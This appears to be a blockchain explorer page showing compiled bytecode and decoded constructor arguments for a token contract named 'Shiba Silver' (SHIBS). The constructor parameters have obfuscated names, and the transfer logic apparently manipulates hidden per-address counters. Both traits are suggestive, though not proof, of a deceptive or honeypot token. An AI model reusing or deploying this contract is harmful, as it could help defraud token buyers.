ffffffffff161461055b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161055290611164565b60405180910390fd5b6105656000610c42565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606003805461059f90611084565b80601f01602080910402602001604051908101604052809291908181526020018280546105cb90611084565b80156106185780601f106105ed57610100808354040283529160200191610618565b820191906000526020600020905b8154815290600101906020018083116105fb57829003601f168201915b5050505050905090565b600061062f3384846108ed565b6001905092915050565b6000600960008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6106c8610c3a565b73ffffffffffffffffffffffffffffffffffffffff166106e6610567565b73ffffffffffffffffffffffffffffffffffffffff161461073c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161073390611164565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036107ab576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107a2906111f6565b60405180910390fd5b6107b481610c42565b50565b60008073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16141580156108225750600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b610861576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161085890611288565b60405180910390fd5b81600960008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600190509392505050565b6000600c60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205414801561098a57508273ffffffffffffffffffffffffffffffffffffffff16600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614155b80156109d557506000600b60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054115b15610a4357600460009054906101000a900460ff1660ff16600c60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610a3b91906110e4565b925050819055505b6000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905082600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506000600c60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205403610b495781600a60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610b4191906110e4565b925050819055505b6000606460015484610b5b91906112a8565b610b659190611331565b90508083610b7391906110e4565b9250600460009054906101000a900460ff1660ff16600b60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610bd69190611362565b9250508190555082600a60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610c2c9190611362565b925050819055505050505050565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600081519050919050565b600082825260208201905092915050565b60005b83811015610d40578082015181840152602081019050610d25565b60008484015250505050565b6000601f19601f8301169050919050565b6000610d6882610d06565b610d728185610d11565b9350610d82818560208601610d22565b610d8b81610d4c565b840191505092915050565b60006020820190508181036000830152610db08184610d5d565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000610de882610dbd565b9050919050565b610df881610ddd565b8114610e0357600080fd5b50565b600081359050610e1581610def565b92915050565b6000819050919050565b610e2e81610e1b565b8114610e3957600080fd5b50565b600081359050610e4b81610e25565b92915050565b60008060408385031215610e6857610e67610db8565b5b6000610e7685828601610e06565b9250506020610e8785828601610e3c565b9150509250929050565b60008115159050919050565b610ea681610e91565b82525050565b6000602082019050610ec16000830184610e9d565b92915050565b6000819050919050565b6000610eec610ee7610ee284610dbd565b610ec7565b610dbd565b9050919050565b6000610efe82610ed1565b9050919050565b6000610f1082610ef3565b9050919050565b610f2081610f05565b82525050565b6000602082019050610f3b6000830184610f17565b92915050565b610f4a81610e1b565b82525050565b6000602082019050610f656000830184610f41565b92915050565b600080600060608486031215610f8457610f83610db8565b5b6000610f9286828701610e06565b9350506020610fa386828701610e06565b9250506040610fb486828701610e3c565b9150509250925092565b610fc781610ddd565b82525050565b6000602082019050610fe26000830184610fbe565b92915050565b600060208284031215610ffe57610ffd610db8565b5b600061100c84828501610e06565b91505092915050565b6000806040838503121561102c5761102b610db8565b5b600061103a85828601610e06565b925050602061104b85828601610e06565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061109c57607f821691505b6020821081036110af576110ae611055565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006110ef82610e1b565b91506110fa83610e1b565b9250828203905081811115611112576111116110b5565b5b92915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b600061114e602083610d11565b915061115982611118565b602082019050919050565b6000602082019050818103600083015261117d81611141565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006111e0602683610d11565b91506111eb82611184565b604082019050919050565b6000602082019050818103600083015261120f816111d3565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611272602483610d11565b915061127d82611216565b604082019050919050565b600060208201905081810360008301526112a181611265565b9050919050565b60006112b382610e1b565b91506112be83610e1b565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff04831182151516156112f7576112f66110b5565b5b828202905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b600061133c82610e1b565b915061134783610e1b565b92508261135757611356611302565b5b828204905092915050565b600061136d82610e1b565b915061137883610e1b565b92508282019050808211156113905761138f6110b5565b5b9291505056fea264697066735822122061d2fab4f2d09e870fc486a27f310611cba21f21a3bc0176bf5e32482edffb0164736f6c63430008100033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c00000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d0000000000000000000000004a60a74ab1a7662c28a23c93c2990a3d3fef5277000000000000000000000000000000000000000000000000000000000000000c53686962612053696c766572000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000055348494253000000000000000000000000000000000000000000000000000000
-----Decoded View---------------
Arg [0] : pupil (string): Shiba Silver
Arg [1] : grown (string): SHIBS
Arg [2] : picture (address): 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D
Arg [3] : pretty (address): 0x4a60a74AB1A7662c28A23c93C2990a3d3FeF5277
-----Encoded View---------------
8 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000080
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000c0
Arg [2] : 0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d
Arg [3] : 0000000000000000000000004a60a74ab1a7662c28a23c93c2990a3d3fef5277
Arg [4] : 000000000000000000000000000000000000000000000000000000000000000c
Arg [5] : 53686962612053696c7665720000000000000000000000000000000000000000
Arg [6] : 0000000000000000000000000000000000000000000000000000000000000005
Arg [7] : 5348494253000000000000000000000000000000000000000000000000000000
Loading...
Loading
Loading...
Loading
Multichain Portfolio | 30 Chains
Chain | Token | Portfolio % | Price | Amount | Value |
---|
Loading...
Loading
[ Download: CSV Export ]
A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.